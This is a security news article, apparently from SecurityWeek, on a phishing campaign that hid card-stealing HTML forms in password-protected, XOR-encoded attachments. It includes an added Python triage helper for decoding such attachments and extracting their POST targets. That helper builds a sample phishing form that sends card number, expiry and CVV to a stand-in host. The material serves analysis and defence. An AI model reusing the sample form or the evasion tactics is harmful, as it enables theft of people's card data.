Phishers Adopt Malware Distribution-Like Tactics

A recently detected phishing campaign designed to steal credit card information employed a series of attack tactics previously associated with malware distribution, Proofpoint security researchers reveal.

The technique involves the distribution of a malicious document inside a .zip archive that is password-protected. The archive is attached to an email and the password to open it is included in the email body. Most recently, the method was used to distribute the Cerber ransomware (the campaign also dropped the Ursnif banking Trojan).

Recently, phishers decided to adopt the technique and adapt it to their needs in an attempt to steal banking data. However, instead of an Office document, this attack uses an HTML attachment that has been password-protected.

The email message is personalized with the recipient’s name and with what is presented as the first digits of their credit card number. Because the leading digits of a card number are standardized (they identify the issuer, not the cardholder), this apparent personalization requires no knowledge of a potential victim’s actual card number; it exists only to lend the carefully crafted emails a sense of legitimacy.

Furthermore, the spam emails use stolen branding and social engineering tactics to create a sense of urgency and trick the user into giving away their credit card information: recipients are told they need to update their security information for their “new chip card.”

The HTML attachment used in this campaign was found to be XOR-encoded to make dynamic analysis more difficult. According to Proofpoint, the password protection is implemented with the help of JavaScript. A script named pah.js is used to decrypt the XOR-encoded HTML when the user enters the password.

Once the user enters the password from the email body and the HTML attachment is decrypted, a fairly typical credit card phishing template, complete with stolen branding, is displayed. As in conventional credential phishing pages, the form collects the victim’s details and submits them via HTTP POST.
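As an added illustration (not code from the article or from Proofpoint), the following Python triage helper shows how an analyst can get at the page behind such an attachment: decoding the XOR-"protected" HTML with the password from the email body or, when the email was not preserved, recovering the key from the predictable start of an HTML document, then pulling out the card-data field names and the form's POST target. The attachment bytes, the password and the hex transport encoding are constructed for the example; the real kit's pah.js layout is not described on the page.

```python
import re
from itertools import cycle
from typing import Optional

def xor_bytes(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR is symmetric: the same call encodes and decodes.
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

# Constructed sample attachment (not the real kit): a minimal card-harvesting form,
# XOR-"protected" with a hypothetical password and carried as hex.
SAMPLE_PASSWORD = "chip2017"  # hypothetical; in the campaign it sat in the email body
_PLAIN_HTML = (b"<!DOCTYPE html><html><body>"
               b'<form method="POST" action="https://phish.example/collect.php">'
               b'<input name="cardnumber"><input name="expiry"><input name="cvv">'
               b"</form></body></html>")
SAMPLE_ATTACHMENT_HEX = xor_bytes(_PLAIN_HTML, SAMPLE_PASSWORD.encode()).hex()

CARD_FIELD = re.compile(r'name=["\']?(card\w*|cc\w*|cvv|cvc|expir\w*)', re.I)
FORM_ACTION = re.compile(r'<form[^>]*action=["\']([^"\']+)', re.I)

def looks_like_html(text: str) -> bool:
    t = text.lower()
    return "<html" in t and "</html>" in t

def recover_key(encoded: bytes, known_prefix: bytes = b"<!DOCTYPE html>") -> Optional[bytes]:
    # Known-plaintext recovery for when the email (and its password) was not kept: an HTML
    # page starts predictably, and XOR leaks the key wherever the plaintext is known.
    # Handles keys no longer than the known prefix; each candidate decode is validated.
    for n in range(1, len(known_prefix) + 1):
        key = xor_bytes(encoded[:n], known_prefix[:n])
        if looks_like_html(xor_bytes(encoded, key).decode("latin-1")):
            return key
    return None

def triage(encoded_hex: str, password: Optional[str] = None) -> dict:
    # Decode with the password from the email body (or recover it), then extract what
    # an analyst wants first: the field names asking for card data and the POST target.
    raw = bytes.fromhex(encoded_hex)
    key = password.encode() if password else recover_key(raw)
    if key is None:
        return {"decoded": False}
    html = xor_bytes(raw, key).decode("utf-8", "replace")
    if not looks_like_html(html):
        return {"decoded": False}
    return {
        "decoded": True,
        "key": key.decode("latin-1"),
        "card_fields": sorted({m.group(1).lower() for m in CARD_FIELD.finditer(html)}),
        "post_targets": FORM_ACTION.findall(html),
    }
```

The POST target is the indicator worth blocking and hunting for in proxy logs; the decoded page itself can then be fed to the usual static scanners that the XOR layer was meant to blind.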

The use of a password-protected attachment is meant not only to make detection and analysis more difficult, but also to convince users that the email is legitimate. The fact that the password is included in the email body also adds to this sense of legitimacy, in addition to making it easy for the recipients to open the attachment.

“Credential and credit card phishing are nearly as old as cybercrime itself. This hasn’t stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password-protected document attachments to bypass anti-malware technologies and give recipients a false sense of security,” Proofpoint researchers note.

Related: Backdoored Phishing Templates Advertised on YouTube

Related: Cybercriminals Use New Tricks in Phishing Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.